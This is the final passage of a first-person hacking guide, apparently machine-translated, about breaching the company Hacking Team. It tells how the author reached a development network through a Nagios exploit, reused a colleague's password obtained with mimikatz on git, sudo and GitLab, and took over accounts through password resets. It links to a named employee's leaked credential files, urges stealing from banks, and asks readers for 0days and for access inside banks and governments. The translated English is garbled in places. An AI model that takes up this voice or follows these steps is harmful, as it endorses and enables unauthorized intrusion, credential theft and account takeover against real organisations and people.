[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


- [15 - The Bridge] ------------------------------------------ ------------------

Within the volume encryption Christian Pozzi, there was a textfile with many
passwords [1]. One was for a Nagios server Fully Automated,
I had access to sviluppo network to monitor it. Had found
the bridge. Only had the password for the Web interface, but there was a
Public exploit [2] to execute code and get a shell (is an exploit
unauthenticated, but it takes a user has logged in to the
I used that password textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


- [16 - Reusing and restoring passwords] ----------------------------

Reading the post, he had seen Milan Daniele granting access to
git repositories. And I had its windows password by mimikatz. The
I tried with git server and it worked. I tried sudo and it worked. For him
gitlab server and your twitter account, I used the "I forgot my
Password "and my access to the mail server to restore
password.


- [17 - Conclusion] ------------------------------------------- ----------------

It is done. So easy it is to tear down a company and stop their abuses
human rights. That is the beauty and the asymmetry of hacking: with only a hundred
hours of work, one person can undo years of work of a
multimillion-dollar company. The hacking gives us the possibility of the dispossessed
fight and win.

Hacking guides often end with a warning: This information is
only for educational purposes, I am an ethical hacker, not attacks on computers without
permission, gobbledygook. I will say the same, but with a more rebellious concept
hacking "ethical". Filter ethical hacking documents would expropriate money
banks, and protect computers of ordinary people. However, the
Most people who call themselves "ethical hackers" work only
to protect those who pay their consulting fee, which often are the
they most deserve to be hacked.

Hacking Team is see themselves as part of a tradition of inspiring
Italian [1] design. I see them Vincenzetti, your company, and their cronies
police, police, and government, as part of a long tradition of
Italian fascism. I want to dedicate this guide to the victims of the assault on the
Armando Diaz school, and all those who have shed their blood on hands
Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


- [18 - Contact] ------------------------------------------- ------------------

To send spearphishing attempts, death threats written in
Italian [1] [2] and to give me 0days or access within banks,
corporations, governments etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

porfa only encrypted mails:
https://securityinabox.org/es/thunderbird_usarenigmail

-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFVp37MBCACu0rMiDtOtn98NurHUPYyI3Fua+bmF2E7OUihTodv4F/N04KKx
vDZlhKfgeLVSns5oSimBKhv4Z2bzvvc1w/00JH7UTLcZNbt9WGxtLEs+C+jF9j2g
27QIfOJGLFhzYm2GYWIiKr88y95YLJxvrMNmJEDwonTECY68RNaoohjy/TcdWA8x
+fCM4OHxM4AwkqqbaAtqUwAJ3Wxr+Hr/3KV+UNV1lBPlGGVSnV+OA4m8XWaPE73h
VYMVbIkJzOXK9enaXyiGKL8LdOHonz5LaGraRousmiu8JCc6HwLHWJLrkcTI9lP8
Ms3gckaJ30JnPc/qGSaFqvl4pJbx/CK6CwqrABEBAAG0IEhhY2sgQmFjayEgPGhh
Y2tiYWNrQHJpc2V1cC5uZXQ+iQE3BBMBCgAhBQJXAvPFAhsDBQsJCAcDBRUKCQgL
BRYCAwEAAh4BAheAAAoJEDScPRHoqSXQoTwIAI8YFRdTptbyEl6Khk2h8+cr3tac
QdqVNDdp6nbP2rVPW+o3DeTNg0R+87NAlGWPg17VWxsYoa4ZwKHdD/tTNPk0Sldf
cQE+IBfSaO0084d6nvSYTpd6iWBvCgJ1iQQwCq0oTgROzDURvWZ6lwyTZ8XK1KF0
JCloCSnbXB8cCemXnQLZwjGvBVgQyaF49rHYn9+edsudn341oPB+7LK7l8vj5Pys
4eauRd/XzYqxqNzlQ5ea6MZuZZL9PX8eN2obJzGaK4qvxQ31uDh/YiP3MeBzFJX8
X2NYUOYWm3oxiGQohoAn//BVHtk2Xf7hxAY4bbDEQEoDLSPybZEXugzM6gC5AQ0E
VWnfswEIANaqa8fFyiiXYWJVizUsVGbjTTO7WfuNflg4F/q/HQBYfl4ne3edL2Ai
oHOGg0OMNuhNrs56eLRyB/6IjM3TCcfn074HL37eDT0Z9p+rbxPDPFOJAMFYyyjm
n5a6HfmctRzjEXccKFaqlwalhnRP6MRFZGKU6+x1nXbiW8sqGEH0a/VdCR3/CY5F
Pbvmhh894wOzivUlP86TwjWGxLu1kHFo7JDgp8YkRGsXv0mvFav70QXtHllxOAy9
WlBP72gPyiWQ/fSUuoM+WDrMZZ9ETt0j3Uwx0Wo42ZoOXmbAd2jgJXSI9+9e4YUo
jYYjoU4ZuX77iM3+VWW1J1xJujOXJ/sAEQEAAYkBHwQYAQIACQUCVWnfswIbDAAK
CRA0nD0R6Kkl0ArYB/47LnABkz/t6M1PwOFvDN3e2JNgS1QV2YpBdog1hQj6RiEA
OoeQKXTEYaymUwYXadSj7oCFRSyhYRvSMb4GZBa1bo8RxrrTVa0vZk8uA0DB1ZZR
LWvSR7nwcUkZglZCq3Jpmsy1VLjCrMC4hXnFeGi9AX1fh28RYHudh8pecnGKh+Gi
JKp0XtOqGF5NH/Zdgz6t+Z8U++vuwWQaubMJTRdMTGhaRv+jIzKOiO9YtPNamHRq
Mf2vA3oqf22vgWQbK1MOK/4Tp6MGg/VR2SaKAsqyAZC7l5TeoSPN5HdEgA7u5GpB
D0lLGUSkx24yD1sIAGEZ4B57VZNBS0az8HoQeF0k
=E5+y
-----END PGP PUBLIC KEY BLOCK-----

If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                </pre>
         </p>



        </div>
      </div>
      <hr>

      <footer>
        <p>CC BY-NC</p>
      </footer>

    </div> <!-- /container -->

    <!-- Le javascript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="js/jquery.js"></script>
    <script src="js/bootstrap-386.js"></script>
    <script src="js/bootstrap-transition.js"></script>
    <script src="js/bootstrap-alert.js"></script>
    <script src="js/bootstrap-modal.js"></script>
    <script src="js/bootstrap-dropdown.js"></script>
    <script src="js/bootstrap-scrollspy.js"></script>
    <script src="js/bootstrap-tab.js"></script>
    <script src="js/bootstrap-tooltip.js"></script>
    <script src="js/bootstrap-popover.js"></script>
    <script src="js/bootstrap-button.js"></script>
    <script src="js/bootstrap-collapse.js"></script>
    <script src="js/bootstrap-carousel.js"></script>
    <script src="js/bootstrap-typeahead.js"></script>
    <script src="js/bootstrap-affix.js"></script>
    <script>
        _386 = { onePass: true, speedFactor: 0.825 };
    </script>
  </body>
</html>